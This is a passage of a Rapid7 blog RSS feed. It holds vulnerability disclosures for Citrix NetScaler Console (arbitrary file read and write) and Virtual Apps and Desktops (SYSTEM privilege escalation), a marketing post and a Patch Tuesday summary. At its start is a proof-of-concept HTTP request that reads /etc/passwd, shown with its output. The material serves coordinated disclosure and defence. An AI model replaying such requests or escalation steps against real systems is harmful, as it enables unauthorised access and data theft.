Cookie: user_rand=undefined; startin=/admin_ui/mas/ent/html/main.html; version_status=true; skip_ftu_flow_temp=true; logged_in_user_name=nsroot; SESSID=##42641EE25C0BCBCDF65CE5CDF4A119F51E0472A52D607E645794D553F9C6; license_types=3; url_enabled=1; domain_enabled=0; cr_enabled=0; sla_enabled=1
Priority: u=0
file: /etc/passwd
Authorization: CWSAuth service=XXX



HTTP/1.1 200 OK
Date: Tue, 08 Apr 2025 11:37:20 GMT
Connection: Keep-Alive
Referrer-Policy: strict-origin-when-cross-origin
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Type: application/octet-stream
Content-Disposition: attachment
Content-Transfer-Encoding: binary
Last-Modified: Tue, 08 Apr 2025 09:23:59 GMT
Content-Length: 1791

# $FreeBSD: releng/11.4/etc/master.passwd 359448 2020-03-30 17:11:21Z brooks $
#
root:*:0:0:Charlie &:/root:/usr/bin/bash
nsroot:*:0:0:Netscaler Root:/root:/mps/mpssh
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
...</span></pre><p><span style='color:rgb(102, 102, 102);'></span></p><h4><span style='color:rgb(102, 102, 102);'>Impact</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>This is an authenticated vulnerability, which does reduce the risk of exploitation somewhat. However, there are known authentication bypass vulnerabilities affecting the same version of the software that could be leveraged to exploit this issue without authentication (CVE-2024-6235). Though not as severe as the ability to write arbitrary files, reading arbitrary files is likely to lead to highly sensitive information disclosure which could be leveraged for additional attacks.  </span></p><h2>Remediation</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The Arbitrary File Write vulnerability </span>CVE-2024-12284,<span style='font-size: undefined;'> was fixed in version </span><span data-type='inlineCode'>14.1-38.53</span> and <span data-type='inlineCode'>13.1-56.18</span><span style='font-size: undefined;'> of NetScaler Console. The Arbitrary File Read vulnerability </span>CVE-2025-4365, <span style='font-size: undefined;'>was fixed in version </span><span data-type='inlineCode'>14.1.47.46</span> and <span data-type='inlineCode'>13.1.58.32</span> of both NetScaler Console and NetScaler SDX. Users should ensure they have updated to these patched versions to mitigate the risk from these vulnerabilities.</p><p>For more information, please refer to the the vendor advisory for CVE-2025-4365 <a href="https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX694729&amp;articleURL=NetScaler_Console_and_NetScaler_SDX_SVM_Security_Bulletin_for_CVE_2025_4365" target="_self">here</a>, and the vendor advisory for CVE-2024-12284 <a href="https://support.citrix.com/external/article?articleUrl=CTX692579-netscaler-console-and-netscaler-agent-security-bulletin-for-cve202412284&amp;language=en_US" target="_self">here</a>.</p><h2>Rapid7 Customers</h2><p>InsightVM and Nexpose customers can assess their exposure to CVE-2025-4365 and CVE-2024-12284 in the NetScaler Console product, with authenticated checks available since the June 18 content release.</p><h2>Disclosure Timeline</h2><ul><li style="direction: ltr;"><span style='font-size: undefined;'>April 2025: Issues discovered by Calum Hutton</span></li><li style="direction: ltr;"><span style='font-size: undefined;'>April 9, 2025: Initial contact with Citrix</span></li><li style="direction: ltr;"><span style='font-size: undefined;'>April 11, 2025: Disclosure details provided to Citrix</span></li><li style="direction: ltr;"><span style='font-size: undefined;'>April 24, 2025: Citrix confirmed they could reproduce issue(s), suggested coordinated disclosure date around mid July. </span></li><li style="direction: ltr;"><span style='font-size: undefined;'>May 29, 2025: Citrix clarified they will not assign a CVE for the Arbitrary File Write via ZipSlip vulnerability as it does not affect the latest version of the product.</span></li><li style="direction: ltr;"><span style='font-size: undefined;'>June 17, 2025, Citrix announced early publication of CVE-2025-4365 for the Arbitrary File Read vulnerability </span></li><li style="direction: ltr;"><span style='font-size: undefined;'>June 18, 2025: Public disclosure via publication of this blog post</span></li><li>June 25, 2025: Citrix provide Rapid7 with the CVE identifier CVE-2024-12284 for the Arbitrary File Write via ZipSlip vulnerability</li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/cve-2025-4365-cve-unassigned-netscaler-console-sdx-authenticated-arbitrary-file-read-write-fixed</link>
      <guid isPermaLink="false">bltb4963fe55f0b8c57</guid>
      <category><![CDATA[Rapid7 Disclosure]]></category>
      <category><![CDATA[Vulnerability Disclosure]]></category>
      <category><![CDATA[Vulnerability Management]]></category>
      <category><![CDATA[Research]]></category><dc:creator><![CDATA[Calum Hutton]]></dc:creator>
      <pubDate>Mon, 14 Jul 2025 14:07:51 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt6b37729ea1f9c63a/6852f75667f5825dce799a46/vuln-disclosure-banner.jpeg" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2025-6759: Citrix Virtual Apps and Desktops - Local Privilege Escalation (FIXED)]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>During a Virtual Desktop Infrastructure (VDI) breakout assessment, Rapid7 identified a Local Privilege Escalation (LPE) vulnerability affecting Citrix Virtual Apps and Desktops. This issue was assigned CVE-2025-6759 and has a CVSS score of </span><a href="https://www.first.org/cvss/calculator/4-0#CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"><span style='font-size: undefined;'>7.3 (High)</span></a><span style='font-size: undefined;'>.</span><br/><br/><span style='font-size: undefined;'>Rapid7 observed a SYSTEM process handle with “PROCESS_ALL_ACCESS” rights from “GfxMgr.exe” being leaked into the “CtxGfx.exe” process. Since the privileged process handle is being leaked into a process that a low privileged user owns, no special privileges are required to duplicate it and spawn a new process using the process handle.</span></p><h2 style="direction: ltr;">Product description</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Citrix Virtual Apps and Desktops (formerly XenApp and XenDesktops) is an application and desktop virtualization solution that enables secure remote access to windows based applications and desktops.</span></p><h2 style="direction: ltr;">Impact</h2><p style="direction: ltr;"><span style='font-size: undefined;'>This vulnerability would allow a low privileged user to duplicate a leaked SYSTEM process handle to spawn a new process as SYSTEM.</span></p><h2 style="direction: ltr;">Credit</h2><p style="direction: ltr;"><span style='font-size: undefined;'>This vulnerability was discovered by Brandon Fisher, Security Consultant at Rapid7, and is being disclosed in accordance with </span><a href="https://www.rapid7.com/security/disclosure/"><span style='font-size: undefined;'>Rapid7's vulnerability disclosure policy</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Exploitation</h2><p style="direction: ltr;"><span style='font-size: undefined;'>This image showcases the current Citrix products and versions running on the vulnerable machine:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt53184643053d2c8d/686ce5e616748251fa1b20ef/cve_2025_6759_image1.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="cve_2025_6759_image1.png" asset-alt="cve_2025_6759_image1.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt53184643053d2c8d/686ce5e616748251fa1b20ef/cve_2025_6759_image1.png" data-sys-asset-uid="blt53184643053d2c8d" data-sys-asset-filename="cve_2025_6759_image1.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="cve_2025_6759_image1.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>This image displays the current low-privileged users identity, and its privileges:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt56d097967376c5f5/686ce605588d46b6a6838b82/cve_2025_6759_image2.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="cve_2025_6759_image2.png" asset-alt="cve_2025_6759_image2.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt56d097967376c5f5/686ce605588d46b6a6838b82/cve_2025_6759_image2.png" data-sys-asset-uid="blt56d097967376c5f5" data-sys-asset-filename="cve_2025_6759_image2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="cve_2025_6759_image2.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>Using a modified version of the public tool “GiveMeAHand”, Rapid7 discovered a SYSTEM process handle with “PROCESS_ALL_ACCESS” rights being leaked into the “CtxGfx.exe” process, which the low-privileged user owns:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt78fa50edfe06feef/686ce6254e32554fae569377/cve_2025_6759_image3.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="cve_2025_6759_image3.png" asset-alt="cve_2025_6759_image3.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt78fa50edfe06feef/686ce6254e32554fae569377/cve_2025_6759_image3.png" data-sys-asset-uid="blt78fa50edfe06feef" data-sys-asset-filename="cve_2025_6759_image3.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="cve_2025_6759_image3.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>Rapid7 utilized the proof of concept tool to duplicate the leaked SYSTEM process handle and spawn a new SYSTEM process:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf4a40cb2ad22b2ec/686ce63ec4493c456ea98ac4/cve_2025_6759_image4.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="cve_2025_6759_image4.png" asset-alt="cve_2025_6759_image4.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf4a40cb2ad22b2ec/686ce63ec4493c456ea98ac4/cve_2025_6759_image4.png" data-sys-asset-uid="bltf4a40cb2ad22b2ec" data-sys-asset-filename="cve_2025_6759_image4.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="cve_2025_6759_image4.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>This screenshot shows the current user is now “NT AUTHORITY\SYSTEM”, and possesses a very limited set of privileges within this process. From here, you could add yourself as a local administrator, or perform other actions with the SYSTEM account:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb8cf4120fd333e59/686ce65228e27153aea3c1f8/cve_2025_6759_image5.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="cve_2025_6759_image5.png" asset-alt="cve_2025_6759_image5.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb8cf4120fd333e59/686ce65228e27153aea3c1f8/cve_2025_6759_image5.png" data-sys-asset-uid="bltb8cf4120fd333e59" data-sys-asset-filename="cve_2025_6759_image5.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="cve_2025_6759_image5.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>After obtaining administrative privileges, Rapid7 used Process Hacker to analyze the vulnerable applications. Rapid7 observed that the “GfxMgr.exe” process was a child process to PicaSessionAgent, which is also a child process of winlogon, both of which are running as “NT AUTHORITY\SYSTEM”:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf99bd0de65f83ce1/686ce6676cdceeb1dec36a14/cve_2025_6759_image6.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="cve_2025_6759_image6.png" asset-alt="cve_2025_6759_image6.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf99bd0de65f83ce1/686ce6676cdceeb1dec36a14/cve_2025_6759_image6.png" data-sys-asset-uid="bltf99bd0de65f83ce1" data-sys-asset-filename="cve_2025_6759_image6.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="cve_2025_6759_image6.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>Inspecting both processes shows they are both Citrix signed applications associated with graphics handling. They are components of the High Definition User Experience (HDX) package within the Citrix Virtual Apps and Desktops platform and reside in “C:\program files\Citrix\HDX\bin”:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt4a59ee0a5ad42882/686ce67c8f61ad30c4dc71bc/cve_2025_6759_image7.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="cve_2025_6759_image7.png" asset-alt="cve_2025_6759_image7.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt4a59ee0a5ad42882/686ce67c8f61ad30c4dc71bc/cve_2025_6759_image7.png" data-sys-asset-uid="blt4a59ee0a5ad42882" data-sys-asset-filename="cve_2025_6759_image7.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="cve_2025_6759_image7.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'><em>Note:</em></span><span style='font-size: undefined;'> These images were taken after machine reboot so the PIDs are different from the original exploitation screenshot. At this point, access to the environment was restricted, and further analysis could not be completed.</span></p><h2 style="direction: ltr;">Remediation</h2><p style="direction: ltr;"><span style='font-size: undefined;'>To fully remediate against CVE-2025-6759, users running a Current Release (CR) of the product should update to the following versions:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Citrix Virtual Apps and Desktops 2503 and later versions</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Users running a Long Term Service Release (LTSR) of the product should update to the following versions:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Citrix Virtual Apps and Desktops 2402 LTSR CU1 Update 1</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Citrix Virtual Apps and Desktops 2402 LTSR CU2 Update 1</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>For users who cannot apply the above versions, the vendor has made a temporary workaround available. For additional details, please see the </span><a href="https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX694820&amp;articleURL=Windows_Virtual_Delivery_Agent_for_CVAD_and_Citrix_DaaS_Security_Bulletin_CVE_2025_6759"><span style='font-size: undefined;'>vendor advisory</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Customer remediation</h2><p>The Rapid7 pentesting team routinely discovers product vulnerabilities during the course of customer engagements. Upon discovering the vulnerabilities outlined in this disclosure, the team informed the customer and included the customer in debriefs related to ongoing disclosure-related communications. Rapid7 has been actively involved in coordination with the customer to secure the customer environment and confirm all Citrix services are properly patched and up-to-date as patches for the service are released.</p><h2>Rapid7 customers</h2><p><span style='font-size: undefined;'>InsightVM and Nexpose customers can assess their exposure to CVE-2025-6759 with an authenticated check expected to be available in the July 8 content release.</span></p><h2 style="direction: ltr;">Disclosure timeline</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>March 2025:</strong></span><span style='font-size: undefined;'> Issue discovered by Brandon Fisher.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>April 11, 2025:</strong></span><span style='font-size: undefined;'> Initial disclosure to Citrix.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>April 11, 2025:</strong></span><span style='font-size: undefined;'> Citrix acknowledges disclosure.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>April 24, 2025:</strong></span><span style='font-size: undefined;'> Citrix confirmed they could reproduce the issue.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>July 8, 2025:</strong></span><span style='font-size: undefined;'> Public disclosure via publication of this blog post (planned).</span></p></li></ul><h2 style="direction: ltr;"> References</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://aptw.tf/2022/02/10/leaked-handle-hunting.html"><span style='font-size: undefined;'>https://aptw.tf/2022/02/10/leaked-handle-hunting.html</span></a></p></li><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://web.archive.org/web/20240110040601/https://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/"><span style='font-size: undefined;'>https://web.archive.org/web/20240110040601/https://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/</span></a></p></li><li style="direction: ltr;"><p style="direction: ltr;"><a href="https://github.com/bananabr/Givemeahand"><span style='font-size: undefined;'>https://github.com/bananabr/Givemeahand</span></a></p></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/cve-2025-6759-citrix-virtual-apps-and-desktops-fixed</link>
      <guid isPermaLink="false">blt612fdc13e7ee241b</guid>
      <category><![CDATA[Vulnerability Disclosure]]></category>
      <category><![CDATA[Vulnerability Management]]></category>
      <category><![CDATA[Research]]></category><dc:creator><![CDATA[Brandon Fisher]]></dc:creator>
      <pubDate>Mon, 14 Jul 2025 14:07:39 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt11e9686cec540b6e/6849381f7431da65da41b88f/post-hero-vulnerability.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Coverage Plus Context Equals Intelligent Exposure Management]]></title>
      <description><![CDATA[<p style="direction: ltr;"><a href="/fundamentals/common-vulnerabilities-and-exposures-cve/" target="_self"><span style='font-size: undefined;'>Common Vulnerabilities and Exposures (CVEs)</span></a><span style='font-size: undefined;'> is the standardized directory of publicly known software flaws that attackers can exploit to carry out cyber attacks. </span><a href="/fundamentals/vulnerability-management-and-scanning/" target="_self"><span style='font-size: undefined;'>Vulnerability management</span></a><span style='font-size: undefined;'> solutions scan for CVEs to give you a list of all the gaps in your </span><a href="/fundamentals/attack-surface/" target="_self"><span style='font-size: undefined;'>attack surface</span></a><span style='font-size: undefined;'>, but the volume of new vulnerabilities has been growing significantly in recent years. In 2024, there were over 100 security defects announced every day. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Each time one of these software insecurities emerges, organizations must decide whether they’re facing more noise or a legitimate, business-disrupting risk. This dilemma is why organizations are trying to combine broad CVE coverage with threat-aware context, making this combination a mandatory component of their </span><a href="/fundamentals/what-is-exposure-management/" target="_self"><span style='font-size: undefined;'>exposure management</span></a><span style='font-size: undefined;'> solutions. Without maximum CVE visibility or a comprehensive, unique understanding of what each vulnerability means to the business, teams are unable to fully protect their attack surface.</span></p><h2 style="direction: ltr;">The risks of partial visibility</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Consider this: An old version of ConnectWise ScreenConnect has a security flaw that attackers can use to bypass authentication controls and breach your network, using it as a launchpad to execute commands, install malware, and move laterally across your environment. Your scanner failed to flag this CVE because it only prioritized “high-risk” or “most exploited” CVEs – a logic that sounded good on paper — but in practice created a blind spot for an attacker to get inside your network. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Adversaries are opportunists, not bound by a curated list of “Top 10 CVEs.” They exploit whatever works, and what works is sometimes what you didn’t know existed. An exposure management solution with broad CVE coverage helps teams reduce the likelihood of exposures because it is more likely to scan a vulnerability that is impactful to your organization, but maybe didn’t make the CISA KEV catalog.</span></p><h2 style="direction: ltr;">Start with coverage, expand with context</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Modern environments are sprawling, complex, and full of surprises. With cloud misconfigurations, forgotten third-party libraries, and ancient PostgreSQL instances that teams assume are “dev-only,” there’s no such thing as a “manageable attack surface” anymore. You should assume everything is fair game for attackers, and think </span><span style='font-size: undefined;'><em>how they think</em></span><span style='font-size: undefined;'> when prioritizing remediation. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This means that “expansive CVE coverage” shouldn’t just mean more CVEs. Your exposure management solution should incorporate internal and external scanning with threat intelligence, so it understands the nuances of how a CVE with a medium severity rating might be trivial in one setup but a disruptive compromise in another that has exposed services, open ports, or overprivileged access controls. Organizations are realizing that they cannot limit vulnerability coverage to </span><span style='font-size: undefined;'><em>criticals</em></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><em>highs</em></span><span style='font-size: undefined;'> because it leaves them one oversight away from the next breach headline.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Legacy vulnerability management tools offer a list of CVEs and their CVSS scores (a severity rating from 0-10). Some exposure management solutions go a bit further by acting as an aggregator of other vulnerability management tools’ findings. A top-tier exposure management platform takes both approaches and automatically incorporates actionable, threat-aware context, such as outlined below:</span></p><table><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Consideration</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Reasoning</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Is this CVE actively being exploited in the wild?</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>A theoretical exploit can be less concerning than an active one.</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Is the affected asset internet-facing?</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>A vulnerable server in a protected lab is probably less of a worry than one broadcasting to the internet.</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Can an attacker chain this CVE with another misconfiguration or weakness to reach a critical asset?</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>It's often not just about one security flaw, but about a combination of flaws that, stitched together, lead to sensitive data.</span></p></td></tr></tbody></table><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>A comprehensive exposure management platform analyzes, correlates, and contextualizes CVEs, and it all starts with having expansive vulnerability coverage to give your analytics engine a rich source of data to work with. This enables security teams to identify exploit chains, uncover hidden dependencies, and forecast attack paths before they’re utilized by cybercriminals.</span></p><h2 style="direction: ltr;">Think before you remediate</h2><p style="direction: ltr;"><span style='font-size: undefined;'>We’ve discussed the value of expansive CVE coverage, but it’s important to note that you don’t have to immediately begin remediating every vulnerability the moment it arises. Knowing key details about each one gives you the power of choice, context, and command. In a threat landscape that never stops changing, organizations are turning to Rapid7’s all-in-one Exposure Command platform that combines the industry’s </span><a href="https://www.rapid7.com/db/"><span style='font-size: undefined;'>largest database of CVEs</span></a><span style='font-size: undefined;'> with a </span><a href="https://docs.rapid7.com/insightvm/working-with-risk-strategies-to-analyze-threats/"><span style='font-size: undefined;'>threat-aware risk scoring methodology</span></a><span style='font-size: undefined;'>. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For proof, let’s consider the ConnectWise example highlighted earlier. Rapid7 identified the vulnerability on February 20, 2024 and delivered coverage as well as a Metasploit exploit module by February 21st – just a day later. This early information was invaluable, allowing for mitigation before the vulnerability was actively exploited in the wild. CISA later added it to their KEV catalog on February 22. With more than 102,000 vulnerabilities mapped, Rapid7 provides a large database of exposures, trusted by thousands of the world’s leading enterprises who are moving beyond analyzing simple lists of CVEs to understanding the full tapestry of their attack surfaces.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Start taking command of your attack surface: </span><a href="https://www.rapid7.com/product-tours/"><span style='font-size: undefined;'>Tour Rapid7’s Exposure Command platform</span></a><span style='font-size: undefined;'> today.</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/coverage-plus-context-equals-intelligent-exposure-management</link>
      <guid isPermaLink="false">bltc823e2b1e227c2a7</guid>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Joel Alcon]]></dc:creator>
      <pubDate>Mon, 14 Jul 2025 14:07:37 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blted8cb9466d79dc4d/6852c596a274324cfbb23d9d/PSN-gov-showcase-hero-image.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Patch Tuesday - June 2025]]></title>
      <description><![CDATA[<p>Microsoft is addressing 67 vulnerabilities this <a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Jun">June 2025 Patch Tuesday</a>. Microsoft has evidence of in-the-wild exploitation for just one of the vulnerabilities published today, and that is reflected in <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">CISA KEV</a>. Separately, Microsoft is aware of existing public disclosure for one other freshly published vulnerability. Microsoft’s luck holds for a ninth consecutive Patch Tuesday, since neither of today’s zero-day vulnerabilities are evaluated as critical severity at time of publication. Today also sees the publication of eight critical remote code execution (RCE) vulnerabilities. Two browser vulnerabilities have already been published separately this month, and are not included in the total.</p><h3>Windows WebDAV: zero-day RCE</h3><p>Remember <a href="https://datatracker.ietf.org/doc/html/rfc2291">the WebDAV standard</a>? It has been seven years since Microsoft has published a vulnerability in the Windows implementation of WebDAV, and today’s publication of <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-33053">CVE-2025-33053</a> is the first zero-day vulnerability on record. Originally dreamed up in the 1990s to support interactivity on the web, WebDAV may be familiar to Exchange admins and users of a certain vintage, since older versions of Exchange, up to and including Exchange Server 2010, supported WebDAV as a means for interacting with mailboxes and public folders.</p><p>It will surprise no one that Windows still more or less supports WebDAV, and that turns out to be a bit of a problem. Microsoft acknowledges Check Point Research (CPR) on the advisory; CPR in turn attributes exploitation of CVE-2025-33053 to an APT, which they track as <a href="https://attack.mitre.org/groups/G0038/">Stealth Falcon</a>, an established threat actor with a long-running interest in governments and government-adjacent entities across the Middle East and the surrounding area.</p><p>Curiously, the Microsoft advisory does not mention that t<a href="https://learn.microsoft.com/en-us/windows/whats-new/deprecated-features">he Windows implementation of WebDAV is listed as deprecated</a> since November 2023, which in practical terms means that the WebClient service no longer starts by default. The advisory also has attack complexity as low, which means that exploitation does not require preparation of the target environment in any way that is beyond the attacker’s control. Exploitation relies on the user clicking a malicious link. It’s not clear how an asset would be immediately vulnerable if the service isn’t running, but all versions of Windows receive a patch, including those released since the deprecation of WebClient, like Server 2025 and Windows 11 24H2. On Server 2025, for instance, it’s still possible to install the WebDAV Redirector server feature, which then causes the WebClient service to appear.</p><h3>SMB client: zero-day EoP</h3><p>Publicly disclosed elevation of privilege (EoP) zero-day vulnerabilities that lead to SYSTEM are always going to be worth a closer look, and <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-33073">CVE-2025-33073</a> is no exception. The advisory sets out that the easiest path to exploitation simply requires the user to connect to a malicious SMB server controlled by the attacker. It’s not entirely clear from the advisory whether simply connecting is enough to trigger exploitation, or whether successful authentication is required, since there is currently conflicting language in two separate FAQ entries with almost-identical titles: “How could an attacker exploit this/the vulnerability?” It may well be that Microsoft will come back around and clarify this wording, but in the meantime the only safe assumption is that fortune favours the attacker.</p><h3>Windows KDC Proxy: critical RCE</h3><p>The Windows KDC Proxy Service (KPSSVC) receives a patch today for <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-33071">CVE-2025-33071</a>, which describes a critical unauthenticated RCE vulnerability where exploitation is via abuse of a cryptographic protocol weakness. The good news is that only Windows Server assets configured as a Kerberos Key Distribution Center Proxy Protocol server — happily, this is not enabled as standard configuration for a domain controller — and exploitation requires that the attacker win a race condition. The bad news is that Microsoft considers exploitation more likely regardless, and since a KDC proxy helps Kerberos requests from untrusted networks more easily access trusted assets without any need for a direct TCP connection from the client to the domain controller, the trade-off here is that the KDC proxy itself is quite likely to be exposed to an untrusted network. Patching this vulnerability should be top of mind for affected defenders this month.</p><h3>Office preview pane: trio of critical RCEs</h3><p>Microsoft expects that exploitation of three Office critical RCE vulns patched today is more likely. <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47162">CVE-2025-47162</a>, <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47164">CVE-2025-47164</a>, and <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-47167">CVE-2025-47167</a> share several attributes: each was discovered by prolific researcher 0x140ce, who topped the MSRC 2025 Q1 leaderboard, and each includes the Preview Pane as a vector, which always ups the ante for defenders. Admins responsible for installations of Microsoft 365 Apps for Enterprise — also confusingly referred to as “Microsoft 365 for Office” in the advisory FAQ — will have to hang on, since patches for today’s vulnerabilities aren’t yet available for that particular facet of the Microsoft 365 kaleidoscope.</p><h3>Microsoft lifecycle update</h3><p>June is a quiet month for Microsoft product lifecycle changes. The next batch of significant Microsoft product lifecycle status changes are due in July 2025, when the SQL Server 2012 ESU program draws to a close, along with support for Visual Studio 2022 17.8 LTSC.</p><h2>Summary charts</h2><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta6aa7c8341a71768/6849810e183770eee21f2eaa/blog-patch-1.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-patch-1.png" asset-alt="blog-patch-1.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta6aa7c8341a71768/6849810e183770eee21f2eaa/blog-patch-1.png" data-sys-asset-uid="blta6aa7c8341a71768" data-sys-asset-filename="blog-patch-1.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-patch-1.png" sys-style-type="display"/></p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0108047c58f9e588/6849810e9750411460ad95d9/blog-patch-2.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-patch-2.png" asset-alt="blog-patch-2.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0108047c58f9e588/6849810e9750411460ad95d9/blog-patch-2.png" data-sys-asset-uid="blt0108047c58f9e588" data-sys-asset-filename="blog-patch-2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-patch-2.png" sys-style-type="display"/><img 